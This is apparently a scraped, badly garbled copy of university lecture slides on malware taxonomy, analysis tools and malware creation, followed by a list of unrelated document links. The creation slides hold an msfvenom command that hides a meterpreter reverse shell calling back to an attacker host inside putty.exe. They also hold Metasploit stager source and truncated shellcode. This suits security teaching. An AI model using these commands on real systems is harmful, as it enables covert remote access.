• Home

  • Documents

  • Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r...
11
Author: Bill Buchanan Author: Bill Buchanan Stateful firewall PIX/ASA Author: Prof Bill Buchanan Author: Prof Bill Buchanan Malware Creation and Detection Understand the creation of Malware in Metasploit. Understand the detection of Malware.

Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

  • Upload
    lybao

  • View
    213

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill BuchananAuthor: Prof Bill Buchanan

Malware Creation and Detection Understand the creation of Malware in Metasploit.

Understand the detection of Malware.

Page 2: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill Buchanan

Data

Hid

ing

Author: Prof Bill Buchanan

Co

de C

on

ve

rsio

nM

alw

are

Author: Prof Bill Buchanan

Software Conversion

Anchor point

software

Malware

Phishing email

(Flash, Java,

PDF)

Pirate Bay

Backdoor

Call Back

Jump-off point

Page 3: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill Buchanan

Data

Hid

ing

Author: Prof Bill Buchanan

Ta

xo

no

my

Ma

lwa

re

Author: Prof Bill Buchanan

Classification

Classification

A

malware

of

Trojan horse Trojan horses.

This involves users

running programs

which look valid,

but install an illicit

program which will

typically do

damage to the

host.

Malevolent worms. This involves

a worm program which mutates in

a given way which will eventually

reduce the quality of service on the

network, such as using up CPU

resources or network bandwidth.

Exploit

Exploit. This involves using

compromising a vulnerability, such

as Application (Adobe Reader),

Operating System (Windows) or

Browser (Mozilla).

Viruses. This

involves attaching

program which self

replicate themselves.

Viruses

Backdoor

RansomwareRansomware.

Ransomware

involves extorting

money from

victims, such as for

access a given site

such as for pirate

software.

Worms

Backdoor. An

intentional

system hook

left open to

connect to.

Page 4: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill Buchanan

Data

Hid

ing

Author: Prof Bill Buchanan

Ta

xo

no

my

Ma

lwa

re

Author: Prof Bill Buchanan

Taxonomy

ClassificationDistribution

Method

Observable

Distribution

Events

System

Compromise

System

Persistence

Method

Observable

Persistence

Attributes

Trigger Event

Observable

Attack MethodsAttack MethodDamageObjectives

for

which results

in

A

malware

of

is distributed by

Obfuscation

Method

and avoids detection using and has

which uses a

Obfuscation

Method

and stays on

the system

using

which can be

found with

and triggered

by

which has

using an

Malware

and avoids

detection

using

Page 5: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill Buchanan

Data

Hid

ing

Author: Prof Bill Buchanan

Analy

sis

Tools

Malw

are

Author: Prof Bill Buchanan

Analysis Tools (Static Analysis)

Static

Analysis

Anti-virus

signatures

Strings from the malware

Malware

Page 6: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill Buchanan

Data

Hid

ing

Author: Prof Bill Buchanan

Analy

sis

Tools

Malw

are

Author: Prof Bill Buchanan

Analysis Tools (Dynamic Analysis)

Dynamic

Analysis

File Monitoring

File Integrity check

Malware

C:\> fciv c:\ -r -type *.txt -sha1 -xml db.xml

C:\> fciv -list -sha1 -xml db.xml

C:\> fciv -v c:\ -sha1 -xml db.xml

Starting checksums verification : 01/01/2014 at 16h35'54

List of modified files:

-----------------------

c:\testing\1.txt

Hash is : f79cbaa6fb67d29a1636db52775de04d7479282e

It should be : 7c3f425725d7d6c48c5243c45d49b928b0bbf0e7

End Verification : 01/01/2014 at 16h35'54

Registry

Monitoring

Process Monitoring

Network

Monitoring

Page 7: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill Buchanan

Data

Hid

ing

Author: Prof Bill Buchanan

Analy

sis

Tools

Malw

are

Author: Prof Bill Buchanan

Analysis Tools (Network Analysis)

Dynamic

Analysis

Payload Analysis

C:\Snort\bin\log>type alert.ids[**] [1:10000:0] Malware [**][Priority: 0]01/01-16:18:08.147386 192.168.47.146:1040 -> 192.168.47.134:25TCP TTL:128 TOS:0x0 ID:167 IpLen:20 DgmLen:1500 DF***A**** Seq: 0x95D103A3 Ack: 0x8108851 Win: 0xFEEF TcpLen: 20

alert tcp any any -> any any (content:"UEsDBBQAAAA"; msg:"Malware";sid:10000)

Page 8: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill Buchanan

Data

Hid

ing

Author: Prof Bill BuchananAuthor: Prof Bill Buchanan

Malw

are

An

aly

sis

Malware Creation

Page 9: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill Buchanan

Data

Hid

ing

Author: Prof Bill Buchanan

Co

de C

on

ve

rsio

nM

alw

are

Author: Prof Bill Buchanan

Malware Conversion

Valid EXE

require 'msf/core'

require 'msf/core/handler/reverse_tcp'

module Metasploit3

include Msf::Payload::Stager

include Msf::Payload::Windows

def initialize(info = {})

super(merge_info(info,

'Name' => 'Reverse TCP Stager',

'Description' => 'Connect back to the attacker',

'Author' => ['hdm', 'skape', 'sf'],

'License' => MSF_LICENSE,

'Platform' => 'win',

'Arch' => ARCH_X86,

'Handler' => Msf::Handler::ReverseTcp,

'Convention' => 'sockedi',

'Stager' =>

{

'RequiresMidstager' => false,

'Offsets' => {

# ExitFunk Offset: 222

'LHOST' => [ 190, 'ADDR' ],

'LPORT' => [ 197, 'n' ],

'ReverseConnectRetries' => [ 188, 'C']

},

Malware EXE

Malware

Metasploit

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[KALI_IP] LPORT=443 -e cmd/powershell_base64 -f exe -i 3 -k -x putty.exe > puttyx.exe

'Payload' =>

"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +

"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +

"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +

"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +

"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +

"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +

"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +

"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +

"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x33\x32\x00\x00\x68\x77" +

"\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00" +

"\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40" +

"\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x6A\x05\x68\x7F\x00" +

"\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\x99\xA5" +

"\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E\x08\x75\xEC\x68\xF0\xB5" +

"\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF" +

"\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4" +

"\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F" +

Page 10: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill Buchanan

Data

Hid

ing

Author: Prof Bill Buchanan

Code C

onvers

ion

Malw

are

Author: Prof Bill Buchanan

Malware Conversion

Valid EXEMalware EXE

Malware

Metasploit

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[KALI_IP] LPORT=443 -e cmd/powershell_base64 -f exe -i 3 -k -x putty.exe > puttyx.exe

'Payload' =>

"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +

"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +

"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +

"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +

"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +

"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +

"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +

"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +

"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x33\x32\x00\x00\x68\x77" +

"\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00" +

"\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40" +

"\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x6A\x05\x68\x7F\x00" +

"\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\x99\xA5" +

"\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E\x08\x75\xEC\x68\xF0\xB5" +

"\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF" +

"\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4" +

"\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F" +

Page 11: Malware Creation and Detection - asecuritysite.com · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l P I X / A S A C o n f i g P I

Au

tho

r:B

ill B

uchanan

Au

tho

r:B

ill B

uchanan

Sta

tefu

l fire

wa

llN

etw

ork

Se

cu

rity

Stateful firewall

PIX

/AS

A C

on

fig

Ne

two

rk S

ecu

rity

PIX/ASA

Author: Prof Bill BuchananAuthor: Prof Bill Buchanan

Malware Creation and Detection Understand the creation of Malware in Metasploit.

Understand the detection of Malware.


i l f./' ~~~t:';;'~~';UM );.

i l f./' ~~~t:';;'~~';UM );.

Documents
N eM F ~ . : L Y T

N eM F ~ . : L Y T

Documents
F A C U L T Y O F L A W - humanrights.dk

F A C U L T Y O F L A W - humanrights.dk

Documents
T F L T C - University of Manitoba

T F L T C - University of Manitoba

Documents
S t i l l l i f e

S t i l l l i f e

Entertainment & Humor
t 1 u l H fa o g s tS n p ri t r lp u in S f a g t s o g f ... · C a b a l l o f a u l t H o t Q S p r i n g s f a u l t H o t S p r i n g s f a u l t C a b a l l o f a u l t C a

t 1 u l H fa o g s tS n p ri t r lp u in S f a g t s o g f ... · C a b a l l o f a u l t H o t Q S p r i n g s f a u l t H o t S p r i n g s f a u l t C a b a l l o f a u l t C a

Documents
F 8 - 0 - orientacionandujar.es · f l j f t j l s f j l t j f g l l s f l j f l o f t h g f o f f t e f l n k g l f s I f l f F T L K F L F P E F E H • Rodea la letra f: f fiesta

F 8 - 0 - orientacionandujar.es · f l j f t j l s f j l t j f g l l s f l j f l o f t h g f o f f t e f l n k g l f s I f l f F T L K F L F P E F E H • Rodea la letra f: f fiesta

Documents
A F A R E W E L L L E T T E R

A F A R E W E L L L E T T E R

Documents
F : = B K L T J E L ? L > ? I : J L : F: : L T J

F : = B K L T J E L ? L > ? I : J L : F: : L T J

Documents
D I F F I C U L T

D I F F I C U L T

Documents
F T L T M l c l al ca f l i l t d - c d qu a ac c a l d u d f t l l - ... b bs sre m f r e r . I rpe p r f r s r f r m e rp ff r sr e s e e r

F T L T M l c l al ca f l i l t d - c d qu a ac c a l d u d f t l l - ... b bs sre m f r e r . I rpe p r f r s r f r m e rp ff r sr e s e e r

Documents
Application notes - Resonance Dwell Testing (bo0250) Dwell Testing — ^^^""\ L L. L L L .L L. £ £ £ £ £ T f *"* ^ ^ ^ ^ * ** * ** f f f f f ** L ' L ' L ' L ' L ' L 'r. Lf

Application notes - Resonance Dwell Testing (bo0250) Dwell Testing — ^^^""\ L L. L L L .L L. £ £ £ £ £ T f *"* ^ ^ ^ ^ * ** * ** f f f f f ** L ' L ' L ' L ' L ' L 'r. Lf

Documents
l • 't F.,,.990 Return ofOrganization ExemptFromIncomeTax990s.foundationcenter.org/990_pdf_archive/132/... · • 't F.,,.990 Departmentof the Treasury Internal RevenueService l

l • 't F.,,.990 Return ofOrganization ExemptFromIncomeTax990s.foundationcenter.org/990_pdf_archive/132/... · • 't F.,,.990 Departmentof the Treasury Internal RevenueService l

Documents
T R E F F P U N K T F Ü R F L Ü C H T L I N G Ediakonieverein-pinneberg.de/images/PCI_02_15.pdfT R E F F P U N K T F Ü R F L Ü C H T L I N G E Organisation Verantwortlich für

T R E F F P U N K T F Ü R F L Ü C H T L I N G Ediakonieverein-pinneberg.de/images/PCI_02_15.pdfT R E F F P U N K T F Ü R F L Ü C H T L I N G E Organisation Verantwortlich für

Documents
F L I G H T F R I G H T :

F L I G H T F R I G H T :

Documents
Semester III Teaching Scheme Credits Assigned Theory ... · ¾ ½ ¯ ® ¿ ¾ ½ ¯ ® ¿ ¾ ½ ¯ ® ³ n t n n dt d f t L f u du L t f t L t f t , L , , 0 Heaviside Unit step function,

Semester III Teaching Scheme Credits Assigned Theory ... · ¾ ½ ¯ ® ¿ ¾ ½ ¯ ® ¿ ¾ ½ ¯ ® ³ n t n n dt d f t L f u du L t f t L t f t , L , , 0 Heaviside Unit step function,

Documents
w[Zy T[d/F L

w[Zy T[d/F L

Documents
CONSUMERgecon.r-forge.r-project.org/models/SW_03.pdf · 2019. 9. 8. · f t K f t 1 r k f t r k f ss K f t 1 e (1+ z ft) 0 z f t (7.10) f t W disutil f t b t L t L s f t ˙ l 0 L

CONSUMERgecon.r-forge.r-project.org/models/SW_03.pdf · 2019. 9. 8. · f t K f t 1 r k f t r k f ss K f t 1 e (1+ z ft) 0 z f t (7.10) f t W disutil f t b t L t L s f t ˙ l 0 L

Documents
R E S U L T O F P O S T A L B A L L O T

R E S U L T O F P O S T A L B A L L O T

Documents
f~Y f Of WILLIAM L. PETERS t f r

f~Y f Of WILLIAM L. PETERS t f r

Documents
“ T H E P I T C H ” - T h e O f f i c i a l N e w s l e t t e r …...“ T H E P I T C H ” - T h e O f f i c i a l N e w s l e t t e r o f F F C Saturday, March 31, 2018 - Volume

“ T H E P I T C H ” - T h e O f f i c i a l N e w s l e t t e r …...“ T H E P I T C H ” - T h e O f f i c i a l N e w s l e t t e r o f F F C Saturday, March 31, 2018 - Volume

Documents
V C 2 1 T D E N F B F E C T F R L E K N D N D L N L ... - Rohmrohmfs.rohm.com/en/products/databook/datasheet/ic/... · k o + t k o-f c t l r n f t k r n f f c t l c d e t t k c d

V C 2 1 T D E N F B F E C T F R L E K N D N D L N L ... - Rohmrohmfs.rohm.com/en/products/databook/datasheet/ic/... · k o + t k o-f c t l r n f t k r n f f c t l c d e t t k c d

Documents
F F S P L A T

F F S P L A T

Documents
l,,L.•. t,.., t- - ,,. • r .• : ,.f ... - M-WTCA

l,,L.•. t,.., t- - ,,. • r .• : ,.f ... - M-WTCA

Documents
C A l l l O l U f f * S T A T X P O L T T X C H N IC C O U

C A l l l O l U f f * S T A T X P O L T T X C H N IC C O U

Documents
Software Security · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l o f w a r e F l a w s S o f t w a r e S e c u r i t y Software

Software Security · n S t a t e f u l f i r e w a l l N e t w o r k S e c u r i t y S t a t e f u l f i r e w a l l o f w a r e F l a w s S o f t w a r e S e c u r i t y Software

Documents
T h e N e w s l e t t e r o f t h e C a l i f o r n I a T r o l l e y & R a I l r … · 2012. 11. 16. · T h e N e w s l e t t e r o f t h e C a l i f o r n I a T r o l l e y &

T h e N e w s l e t t e r o f t h e C a l i f o r n I a T r o l l e y & R a I l r … · 2012. 11. 16. · T h e N e w s l e t t e r o f t h e C a l i f o r n I a T r o l l e y &

Documents
dggs.alaska.govdggs.alaska.gov/webpubs/dggs/aof/oversized/aof061_sh002.pdf · 'l[') ',,!-:[), t I)" .J 'lE r) f I.11 lC ~. L L·'\,~" \ ~ \. T f=;.Jr,f ... CA DAT. BY GRAPHIC. L REP

dggs.alaska.govdggs.alaska.gov/webpubs/dggs/aof/oversized/aof061_sh002.pdf · 'l[') ',,!-:[), t I)" .J 'lE r) f I.11 lC ~. L L·'\,~" \ ~ \. T f=;.Jr,f ... CA DAT. BY GRAPHIC. L REP

Documents
F ind T he L ost

F ind T he L ost

Documents
AL -DAHBI F O O DS T UF F T RADI NG L L C

AL -DAHBI F O O DS T UF F T RADI NG L L C

Documents